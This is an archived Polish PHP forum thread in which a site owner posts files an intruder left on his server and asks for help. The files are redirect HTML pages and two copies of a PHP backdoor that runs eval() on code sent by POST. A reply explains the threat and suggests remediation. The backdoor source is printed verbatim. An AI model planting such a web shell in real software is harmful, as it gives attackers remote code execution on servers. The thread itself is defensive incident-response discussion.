Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [inne][HTML][PHP] Włamanie na serwer, dziwne pliki
Forum PHP.pl > Forum > Przedszkole
adi456
25.01.2012, 12:04:03
Witam,

ostanio przysło mi ostrzeżenie o rozsyłaniu spamu, odkryłem nowe pliki na serwerze, rozumiem że ktoś sie włamał i wykorzystał mój serwer
zna ktoś te pliki? i jak skutecznie zabezpieczyć sie przed tym

nieautoryzowane pliki:

8taIf4yjp.html
[HTML] pobierz, plaintext 
  1. <meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>
[HTML] pobierz, plaintext


Yg3tBUjQw.html
[HTML] pobierz, plaintext 
  1. <meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>
[HTML] pobierz, plaintext


ddslbyi.php
[PHP] pobierz, plaintext 
  1. <?php
  2. error_reporting(4437);
  3. ignore_user_abort(true);
  4. set_time_limit(0);
  5. ini_set('max_execution_time',0);
  6. if (isset($_POST['sdf3sa4'])) {
  7.     $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
  8.     eval($text);
  9. }
  10. ?>
[PHP] pobierz, plaintext


ddseuaq.php
[PHP] pobierz, plaintext 
  1. <?php
  2. error_reporting(4437);
  3. ignore_user_abort(true);
  4. set_time_limit(0);
  5. ini_set('max_execution_time',0);
  6. if (isset($_POST['sdf3sa4'])) {
  7.     $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
  8.     eval($text);
  9. }
  10. ?>
[PHP] pobierz, plaintext
Sephirus
25.01.2012, 12:53:59
Z tego co widzę to te pliki PHP to nie żarty :/

Te pliki ustawiają sobie nieokreślony czas na wykonywanie, ingorują rozłączenie w userem (w teorii mogą chodzić non-stop) a kod do wykonania otrzymują poprzez $_POST :/

Spamowanie to i tak mało w porównaniu z tym co ktoś mógłby z nich wycisnąć...

Zabezpiecz dobrze serwer... Nie znam tych plików ale można nimi wiele zdziałać... :/

Co do opcji skąd się wzięły i jak się zabezpieczyć:
1. Pozmieniaj wszystkie hasła (na jakieś mocne - tak w razie czego)
2. Czy korzystasz na stronie z jakiejś gotowej biblioteki, CMS'a, skryptu, który może zapisywać pliki na serwerze? Jesli tak to ktoś mógł wykorzystać dziurę w kodzie takich skryptów...
3. Co to za serwer? Na czym stoi? Na jakim hostingu/w domu? Od tego dużo zależy...

adi456
25.01.2012, 13:55:42
Serwer wirtualny Pro - w ovh.pl

nie korzystam z gotowych rozwiazań, tylko małe firmowe strony typu edcar-sacz.pl.

już sie zabieram za zmiane haseł

podmieniłem im treść w plikach na 

[PHP] pobierz, plaintext 
  1. $ip = $_SERVER['REMOTE_ADDR'];
  2. $test = $_SERVER['HTTP_USER_AGENT'];
  3. $co=$_POST['sdf3sa4'];
  4.  
  5. $dane = "$ip - $test - $co\n";
  6. $file = "error.txt";
  7. $fp = fopen($file, "r+");
  8.  
  9. $fp = fopen($file, "a");
  10. flock($fp, 2);
  11. fwrite($fp, $dane);
  12. flock($fp, 3);
  13. fclose($fp); 
[PHP] pobierz, plaintext


a czy może powinienem gdzies złożyć zawiadomienie o włamaniu? Nie wiem do jakiego celu ktoś wykorzystywał mój serwer ale zeby później na mnie nie było sad.gif

włamy sa z adresu ip 188.95.49.179
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.